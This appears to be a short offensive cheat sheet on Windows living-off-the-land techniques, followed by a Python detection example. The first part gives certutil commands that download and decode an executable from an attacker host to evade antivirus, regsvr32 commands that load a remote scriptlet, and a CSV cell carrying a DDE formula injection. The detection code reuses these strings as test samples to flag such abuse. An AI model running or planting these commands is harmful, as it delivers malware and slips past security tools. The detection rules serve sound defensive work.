# certutil.exe bypass av on download + base64 Decoding
#First base64-encode the malicious file so that, to an edge device, it appears to be harmless text.
#Then, once the text file is downloaded, the "certutil.exe -decode" command can be used to decode the base64-encoded file
#into the executable.
#This is illustrated in Xavier Mertens' handler diary.
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe
# certutil.exe bypass av on download - dll injection from regsvr32.exe
certutil -urlcache -split -f [serverURL] file.blah
regsvr32.exe /s /u /I:file.blah scrub.dll
#csv malware injection
fillerText1,fillerText2,fillerText3,=MSEXCEL|'\..\..\..\Windows\System32\regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''
=MSEXCEL|'\..\..\..\Windows\System32\regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''
regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll
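Added detection example, not part of the gist: rules for the three patterns collected above (certutil as a downloader/decoder, regsvr32 loading a remote scriptlet, and DDE-style formulas in CSV cells), run over constructed process command lines and a constructed CSV export. Rule names, the sample values and the placeholder hosts (attacker.invalid, 192.0.2.10) are all assumptions made for the example.

```python
import csv
import io
import re

# Constructed sample process-creation command lines (not real telemetry);
# the hosts are documentation/placeholder addresses.
SAMPLE_CMDLINES = [
    'certutil.exe -urlcache -split -f "https://attacker.invalid/badcontent.txt" bad.txt',
    'certutil.exe -decode bad.txt bad.exe',
    'C:\\Windows\\System32\\regsvr32.exe /s /n /u /i:http://192.0.2.10/SCTLauncher.sct scrobj.dll',
    'certutil.exe -verify -urlfetch signed.cer',  # routine certificate check, not a download
    'regsvr32.exe /s vendor.dll',                 # ordinary local DLL registration
]
# Constructed CSV export: one injected DDE cell, one negative number that must not be flagged.
SAMPLE_CSV = (
    "name,dept,balance,note\n"
    "alice,it,-5,ok\n"
    "bob,hr,12,\"=MSEXCEL|'\\..\\..\\..\\Windows\\System32\\regsvr32 /s /n /u /i:http://192.0.2.10/x.sct scrobj.dll'!''\"\n"
)

def classify_cmdline(cmdline: str) -> list[str]:
    """Return the names of the LOLBin abuse patterns a command line matches."""
    hits, lower = [], cmdline.lower()
    exe = lower.split()[0].rsplit("\\", 1)[-1] if lower.split() else ""
    if exe in ("certutil", "certutil.exe"):
        if "-urlcache" in lower and re.search(r"https?://", lower):
            hits.append("certutil_remote_download")   # certutil used as a downloader
        if "-decode" in lower:
            hits.append("certutil_base64_decode")     # binary rebuilt from text
    if exe in ("regsvr32", "regsvr32.exe"):
        if re.search(r"/i:\s*https?://", lower) or "scrobj.dll" in lower:
            hits.append("regsvr32_remote_scriptlet")  # scriptlet loaded via DllInstall
    return hits

def find_csv_formula_cells(text: str) -> list[tuple[int, int, str]]:
    """Return (row, column, rule) for cells a spreadsheet would evaluate as a formula."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text))):
        for c, cell in enumerate(row):
            cell = cell.strip()
            if not cell or cell[0] not in "=+-@":
                continue
            try:
                float(cell)  # "-5" is a number, not a formula
                continue
            except ValueError:
                pass
            # DDE form: =APP|'command'!topic; anything else starting with =+-@ is plain formula injection
            rule = "csv_dde_formula" if re.match(r"^=\w+\|.*!", cell) else "csv_formula_injection"
            findings.append((r, c, rule))
    return findings
```

The CSV check treats any cell starting with `=`, `+`, `-` or `@` that is not a number as formula injection, and separately labels the `=APP|'...'!` DDE shape shown above.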